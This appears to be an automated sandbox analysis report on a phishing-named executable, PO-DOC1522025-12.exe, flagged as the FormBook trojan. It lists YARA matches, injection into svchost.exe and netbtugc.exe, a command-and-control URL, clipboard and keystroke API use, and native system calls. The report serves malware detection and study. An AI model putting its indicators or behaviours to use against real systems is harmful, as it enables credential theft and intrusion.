Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4623753235.0000000004C3D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com
Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4623753235.0000000004C3D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.4623285061.0000000004182000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.4623285061.0000000004182000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003672000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.4617655793.0000000000526000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oau
Source: netbtugc.exe, 00000004.00000002.4617655793.0000000000526000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000003.2487178602.000000000772B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033.d
Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.4617655793.00000000004FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.4623285061.00000000047CA000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003CBA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR
Source: netbtugc.exe, 00000004.00000002.4623285061.0000000003E5E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4625520425.0000000005D00000.00000004.00000800.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.000000000334E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.000000000334E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_001BEAFF

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_001BED6A

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

0_2_001BEAFF

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001AAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_001AAA57

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_001D9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: PO-DOC1522025-12.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PO-DOC1522025-12.exe, 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0586316f-1
Source: PO-DOC1522025-12.exe, 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_737482a6-d
Source: PO-DOC1522025-12.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_67b7bc8c-8
Source: PO-DOC1522025-12.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_eec1251c-9

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042B363 NtClose,	2_2_0042B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B60 NtClose,LdrInitializeThunk,	2_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,	2_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474340 NtSetContextThread,	2_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474650 NtSuspendThread,	2_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BE0 NtQueryValueKey,	2_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BF0 NtAllocateVirtualMemory,	2_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B80 NtQueryInformationFile,	2_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BA0 NtEnumerateValueKey,	2_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AD0 NtReadFile,	2_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AF0 NtWriteFile,	2_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AB0 NtWaitForSingleObject,	2_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F60 NtCreateProcessEx,	2_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F30 NtCreateSection,	2_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FE0 NtCreateFile,	2_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F90 NtProtectVirtualMemory,	2_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FA0 NtQuerySection,	2_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FB0 NtResumeThread,	2_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E30 NtWriteVirtualMemory,	2_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EE0 NtQueueApcThread,	2_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E80 NtReadVirtualMemory,	2_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,	2_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D00 NtSetInformationFile,	2_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D10 NtMapViewOfSection,	2_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D30 NtUnmapViewOfSection,	2_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DD0 NtDelayExecution,	2_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DB0 NtEnumerateKey,	2_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C60 NtCreateKey,	2_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C00 NtQueryInformationProcess,	2_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CC0 NtQueryVirtualMemory,	2_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CF0 NtOpenProcess,	2_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CA0 NtQueryInformationToken,	2_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473010 NtOpenDirectoryObject,	2_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473090 NtSetValueKey,	2_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034739B0 NtGetContextThread,	2_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D70 NtOpenThread,	2_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D10 NtOpenProcessToken,	2_2_03473D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B14340 NtSetContextThread,LdrInitializeThunk,	4_2_00B14340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B14650 NtSuspendThread,LdrInitializeThunk,	4_2_00B14650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12AF0 NtWriteFile,LdrInitializeThunk,	4_2_00B12AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12AD0 NtReadFile,LdrInitializeThunk,	4_2_00B12AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_00B12BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_00B12BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_00B12BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12B60 NtClose,LdrInitializeThunk,	4_2_00B12B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_00B12CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_00B12C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12C60 NtCreateKey,LdrInitializeThunk,	4_2_00B12C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_00B12DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12DD0 NtDelayExecution,LdrInitializeThunk,	4_2_00B12DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_00B12D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_00B12D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_00B12E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_00B12EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12FB0 NtResumeThread,LdrInitializeThunk,	4_2_00B12FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12FE0 NtCreateFile,LdrInitializeThunk,	4_2_00B12FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12F30 NtCreateSection,LdrInitializeThunk,	4_2_00B12F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B135C0 NtCreateMutant,LdrInitializeThunk,	4_2_00B135C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B139B0 NtGetContextThread,LdrInitializeThunk,	4_2_00B139B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12AB0 NtWaitForSingleObject,	4_2_00B12AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12B80 NtQueryInformationFile,	4_2_00B12B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12CF0 NtOpenProcess,	4_2_00B12CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12CC0 NtQueryVirtualMemory,	4_2_00B12CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12C00 NtQueryInformationProcess,	4_2_00B12C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12DB0 NtEnumerateKey,	4_2_00B12DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12D00 NtSetInformationFile,	4_2_00B12D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12EA0 NtAdjustPrivilegesToken,	4_2_00B12EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12E30 NtWriteVirtualMemory,	4_2_00B12E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12FA0 NtQuerySection,	4_2_00B12FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12F90 NtProtectVirtualMemory,	4_2_00B12F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B12F60 NtCreateProcessEx,	4_2_00B12F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B13090 NtSetValueKey,	4_2_00B13090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B13010 NtOpenDirectoryObject,	4_2_00B13010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B13D10 NtOpenProcessToken,	4_2_00B13D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B13D70 NtOpenThread,	4_2_00B13D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001E7920 NtCreateFile,	4_2_001E7920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001E7A70 NtReadFile,	4_2_001E7A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001E7B50 NtDeleteFile,	4_2_001E7B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001E7BE0 NtClose,	4_2_001E7BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001E7D30 NtAllocateVirtualMemory,	4_2_001E7D30

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001AD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_001AD5EB

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_001A1201

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe

Code function: 0_2_001AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_001AE8F6

Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001B2046	0_2_001B2046
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00148060	0_2_00148060
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001A8298	0_2_001A8298
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0017E4FF	0_2_0017E4FF
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0017676B	0_2_0017676B
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001D4873	0_2_001D4873
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0016CAA0	0_2_0016CAA0
